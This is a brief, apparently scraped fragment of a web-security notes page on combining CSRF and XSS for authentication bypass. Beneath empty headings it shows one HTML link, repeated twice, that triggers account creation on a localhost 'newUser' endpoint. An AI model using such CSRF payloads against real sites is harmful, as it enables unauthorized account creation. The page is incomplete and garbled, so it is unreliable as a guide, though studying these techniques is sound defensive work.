CSRF + XSS (auth bypass)
prerequisites
Exploitation
<a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a>Last updated
<a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a>Last updated